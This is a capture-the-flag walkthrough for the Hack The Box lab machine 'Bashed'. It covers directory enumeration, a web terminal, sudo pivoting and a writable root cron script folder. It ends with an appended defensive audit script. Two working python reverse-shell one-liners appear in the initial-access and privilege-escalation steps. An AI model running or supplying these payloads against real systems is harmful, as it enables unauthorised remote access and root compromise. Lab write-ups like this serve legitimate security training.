
HTB : Bashed



  • Directory enumeration reveals a browser-based terminal, which gives initial access.
  • Run a python reverse shell to get a user shell in Kali.
  • sudo permissions allow running commands as the user “scriptmanager” without specifying a password.
  • .py files in the /scripts folder are run by a cron job as root.
  • Create a python file with a reverse shell and root access will be gained.


Run an nmap scan to find open ports.

Port 80 shows us the following.

Nothing interesting

Run a gobuster scan to find hidden directories.

/dev/ gives us the following.

A browser based linux terminal.

The user arrexel has the user.txt file.


Use a python reverse shell script to spawn a shell in kali.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a netcat listener.

sudo -l indicates we are able to use sudo on scriptmanager.

Spawn a python shell and run sudo as scriptmanager.

Find the scripts folder.

There is a python script that writes a txt file.

To check if it's a cron job, I tried removing the test.txt file but was unable to do so. Rename the file and after some time a new test.txt file appears.

This machine seems to run .py files as a cron job, and the job runs as root.

Privilege escalation

Let’s create a new python script with a reverse shell to our machine.

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > exploit.py

Root shell is gained.

The final flag is found.
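
From the defender's side, the condition behind this escalation (a folder whose .py files are executed by a root cron job while a non-root user can write to it) can be audited with a short check. This is an added example, not part of the original write-up; the function name audit_cron_script_dir and its trusted_uid parameter are assumptions made for illustration.

```python
import os
import stat


def audit_cron_script_dir(path, trusted_uid=0):
    """Return (entry, reason) findings for anything under `path` that a
    user other than `trusted_uid` could modify, replace, or add to.

    The directory itself is checked too: write access to a directory lets
    a user add or rename files in it even when the files belong to
    someone else.
    """
    findings = []

    def check(entry):
        st = os.lstat(entry)  # lstat: inspect the link, not its target
        if stat.S_ISLNK(st.st_mode):
            findings.append((entry, "symlink (target may be outside the audited tree)"))
            return
        if st.st_uid != trusted_uid:
            findings.append((entry, f"owned by uid {st.st_uid}, not {trusted_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((entry, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((entry, "world-writable"))

    check(path)
    for root, dirs, files in os.walk(path):  # symlinked dirs are not followed
        for name in dirs + files:
            check(os.path.join(root, name))
    return findings


if __name__ == "__main__":
    import sys
    # Default path matches the folder named in this write-up.
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts"
    for entry, reason in audit_cron_script_dir(target):
        print(f"{entry}: {reason}")
```

An empty result means every entry is owned by the trusted account and writable only by it; any finding on a folder that a root cron job executes from should be fixed by changing ownership to root and removing group and world write bits.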
